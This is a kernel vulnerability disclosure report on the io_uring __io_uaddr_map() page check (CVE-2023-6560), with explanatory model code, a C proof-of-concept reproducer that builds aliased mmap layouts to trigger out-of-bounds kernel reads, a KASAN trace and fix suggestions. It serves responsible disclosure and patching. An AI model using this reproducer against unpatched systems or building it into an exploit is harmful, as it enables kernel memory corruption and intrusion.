io_uring: __io_uaddr_map() handles multi-page region dangerously

__io_uaddr_map() wants to import a region from userspace, and then address the
imported region through the linear mapping area. This requires that the
imported region is physically contiguous.
A comment in __io_uaddr_map() explains that the imported region is usually
just a single page, in which case that is trivially fine.
However, __io_uaddr_map() also has code intended to permit multi-page regions,
in which case it tries to enforce that the entire region maps to the same
folio (in other words, the same head page):

    /*
     * Should be a single page. If the ring is small enough that we can
     * use a normal page, that is fine. If we need multiple pages, then
     * userspace should use a huge page. That's the only way to guarantee
     * that we get contigious memory, outside of just being lucky or
     * (currently) having low memory fragmentation.
     */
    if (page_array[0] != page_array[ret - 1])
        goto err;

This code is wrong for (more or less) two reasons:

1. It only checks the first and last page; it doesn't check any of the pages
in between. Userspace can easily create a set of adjacent VMAs such that
the first and last virtual page map to the same physical page, while pages
in between map to entirely unrelated pages.
2. It misunderstands how compound pages are represented in the kernel, and
will always reject the case it is supposed to allow:
`pin_user_pages_fast()` would return a set of adjacent `struct page`
instances that are associated with the same head page / folio; it
wouldn't return the same `struct page *` for every subpage.
Every chunk of memory of size `PAGE_SIZE` maps to its own `struct page`.
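
Both failure modes can be modelled in userspace. The sketch below is not kernel code: `struct fake_page`, `memmap` and `buggy_check()` are hypothetical stand-ins, with an array of `struct fake_page` playing the role of the kernel's array of `struct page` and array indices playing the role of page frame numbers.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical stand-in for the kernel's struct page; one per 4 KiB frame. */
struct fake_page {
  int unused;
};

/* Hypothetical stand-in for the memmap: element i describes page frame i. */
static struct fake_page memmap[16];

/* Mirrors the first/last comparison quoted above; true means "accepted". */
static bool buggy_check(struct fake_page **page_array, size_t nr_pages)
{
  assert(nr_pages > 0);
  return page_array[0] == page_array[nr_pages - 1];
}

/* Reason 1: frames A, B, C, A. Discontiguous, but first == last. */
static bool accepts_aliased_region(void)
{
  struct fake_page *pages[] = {
    &memmap[3], &memmap[9], &memmap[5], &memmap[3],
  };
  return buggy_check(pages, 4);
}

/* Reason 2: four adjacent frames, as the subpages of a huge page would be. */
static bool accepts_contiguous_region(void)
{
  struct fake_page *pages[] = {
    &memmap[4], &memmap[5], &memmap[6], &memmap[7],
  };
  return buggy_check(pages, 4);
}
```

In this model `accepts_aliased_region()` returns true and `accepts_contiguous_region()` returns false, which is the opposite of what the check is meant to do.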

So if this code is presented with a userspace region of the following shape,
containing individual 4K pages:

[page A]
[page B]
[...]
[page A]

then it will accept the region and assume that `page_to_virt(<page A>)`
returns the address of a page as big as the entire region. Accesses to the
first 4KiB of the region would work as intended; but accesses to later parts
of the region will be out-of-bounds accesses to unrelated pages.
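
To make the overrun concrete, the offsets can be worked out as follows. This is a sketch that assumes 4 KiB pages and the regular 64-byte `struct io_uring_sqe` (no `IORING_SETUP_SQE128`); `sqe_offset()` and `sqe_is_past_first_page()` are hypothetical helper names, not kernel functions.

```c
#include <stdbool.h>
#include <stddef.h>

#define MODEL_PAGE_SIZE 4096u /* assumed page size */
#define MODEL_SQE_SIZE 64u    /* assumed sizeof(struct io_uring_sqe) */

/* Byte offset of SQE number idx from the start of the SQ region. */
static size_t sqe_offset(size_t idx)
{
  return idx * MODEL_SQE_SIZE;
}

/*
 * True if the SQE lies beyond the first page, i.e. the kernel would reach
 * it via page_to_virt(<page A>) plus an offset that leaves page A.
 */
static bool sqe_is_past_first_page(size_t idx)
{
  return sqe_offset(idx) >= MODEL_PAGE_SIZE;
}
```

Under these assumptions SQEs 0 through 63 fit in the first page, and SQE 64 sits at offset 0x1000, the first byte after it. That matches the `64 * NUM_SQ_PAGES` entries requested by the reproducer below.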


Here's a reproducer that submits a bunch of NOP ops (zeroed sqes) until it
overruns the end of the first sq page:

```
#define _GNU_SOURCE
#include <unistd.h>
#include <err.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <linux/io_uring.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

#define NUM_SQ_PAGES 4

int main(void) {
  int memfd_sq = SYSCHK(memfd_create("", 0));
  int memfd_cq = SYSCHK(memfd_create("", 0));
  SYSCHK(ftruncate(memfd_sq, NUM_SQ_PAGES * 0x1000));
  SYSCHK(ftruncate(memfd_cq, NUM_SQ_PAGES * 0x1000));

  // sq
  void *sq_data = SYSCHK(mmap(NULL, NUM_SQ_PAGES*0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, memfd_sq, 0));
  SYSCHK(mmap(sq_data+(NUM_SQ_PAGES-1)*0x1000, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, memfd_sq, 0));

  // cq (rings)
  void *cq_data = SYSCHK(mmap(NULL, NUM_SQ_PAGES*0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, memfd_cq, 0));
  *(volatile unsigned int *)(cq_data+4) = 64 * NUM_SQ_PAGES;
  for (int i=1; i<NUM_SQ_PAGES; i++)
    SYSCHK(mmap(cq_data+i*0x1000, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, memfd_cq, 0));

  struct io_uring_params params = {
    .flags = IORING_SETUP_NO_MMAP | IORING_SETUP_NO_SQARRAY /*| IORING_SETUP_CQE32*/,
    .sq_off = {
      .user_addr = (unsigned long)sq_data
    },
    .cq_off = {
      .user_addr = (unsigned long)cq_data
    }
  };
  int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/64 * NUM_SQ_PAGES, &params));
  printf("uring_fd = %d\n", uring_fd);

  /* submit nops */
  int enter_res = SYSCHK(syscall(__NR_io_uring_enter, uring_fd, 64 * NUM_SQ_PAGES, 0, 0, NULL));
  printf("enter returned %d\n", enter_res);
}
```

It gives a KASAN splat like this (but note that the splat's diagnosis, slab-use-after-free, is wrong because KASAN can't properly detect page-level OOB accesses):

```
[ 73.380288] ==================================================================
[ 73.381745] BUG: KASAN: slab-use-after-free in io_submit_sqes+0x223/0xc00
[ 73.382822] Read of size 1 at addr ffff88810263a000 by task uring-multipage/708
[ 73.383967]
[ 73.384240] CPU: 6 PID: 708 Comm: uring-multipage Not tainted 6.7.0-rc2 #357
[ 73.385316] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
[ 73.386778] Call Trace:
[ 73.387177] <TASK>
[ 73.387520] dump_stack_lvl+0x4a/0x80
[ 73.388117] print_report+0xcf/0x670
[...]
[ 73.389595] kasan_report+0xd8/0x110
[...]
[ 73.391954] io_submit_sqes+0x223/0xc00
[ 73.392570] __do_sys_io_uring_enter+0x965/0x1200
[...]
[ 73.397438] do_syscall_64+0x46/0xf0
[ 73.398004] entry_SYSCALL_64_after_hwframe+0x6e/0x76
[ 73.398787] RIP: 0033:0x7ff8ed2e7989
[ 73.399494] Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d d7 64 0c 00 f7 d8 64 89 01 48
[ 73.402164] RSP: 002b:00007fff76dc3598 EFLAGS: 00000202 ORIG_RAX: 00000000000001aa
[ 73.403277] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007ff8ed2e7989
[ 73.404314] RDX: 0000000000000000 RSI: 0000000000000100 RDI: 0000000000000005
[ 73.411155] RBP: 00007fff76dc3690 R08: 0000000000000000 R09: 0000020000000100
[ 73.412496] R10: 0000000000000000 R11: 0000000000000202 R12: 000055967f6680a0
[ 73.417987] R13: 00007fff76dc3770 R14: 0000000000000000 R15: 0000000000000000
[ 73.419272] </TASK>
[removed irrelevant alloc/free traces of the accessed memory region]
[ 73.449202]
[ 73.449471] The buggy address belongs to the object at ffff88810263a000
[ 73.449471] which belongs to the cache kmalloc-128 of size 128
[ 73.451228] The buggy address is located 0 bytes inside of
[ 73.451228] freed 128-byte region [ffff88810263a000, ffff88810263a080)
[ 73.453173]
[ 73.453429] The buggy address belongs to the physical page:
[ 73.454232] page:000000002be796b3 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x10263a
[ 73.455535] head:000000002be796b3 order:1 entire_mapcount:0 nr_pages_mapped:0 pincount:0
[ 73.456662] flags: 0x200000000000840(slab|head|node=0|zone=2)
[ 73.457522] page_type: 0xffffffff()
[ 73.458045] raw: 0200000000000840 ffff8881000428c0 ffffea0004747e80 0000000000000002
[ 73.459143] raw: 0000000000000000 0000000080200020 00000001ffffffff 0000000000000000
[ 73.460305] page dumped because: kasan: bad access detected
[ 73.461091]
[ 73.461353] Memory state around the buggy address:
[ 73.462038] ffff888102639f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 73.463058] ffff888102639f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 73.464277] >ffff88810263a000: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 73.465289] ^
[ 73.465791] ffff88810263a080: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 73.466795] ffff88810263a100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
```

I'm not sure about the best way to fix it - since the compound page support
can't actually have worked, as explained above, maybe it's easiest to just
drop support for compound pages? Or alternatively we could fix that, but since
nobody seems to have used it, that'd maybe be unnecessary complexity...
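
For reference, if multi-page support were kept, a sound check would have to look at every page rather than just the two ends. The following is a userspace model of one such check, not a proposed patch: `struct model_page` and `pages_are_contiguous()` are hypothetical, and a real kernel version would likely have more to consider (for example whether all pages belong to the same folio).

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical stand-in for the kernel's struct page; one per 4 KiB frame. */
struct model_page {
  int unused;
};

/*
 * True only if every entry is the direct successor of the previous one,
 * i.e. page_array[i] == page_array[0] + i for all i.
 */
static bool pages_are_contiguous(struct model_page **page_array, size_t nr_pages)
{
  assert(nr_pages > 0);
  for (size_t i = 1; i < nr_pages; i++) {
    if (page_array[i] != page_array[0] + i)
      return false;
  }
  return true;
}
```

With the aliased layout from above (page A, page B, ..., page A) this returns false at the second entry, while an array of adjacent `struct model_page` pointers is accepted.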


This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2024-02-22.

Related CVE Numbers: CVE-2023-6560.



Found by: jannh@google.com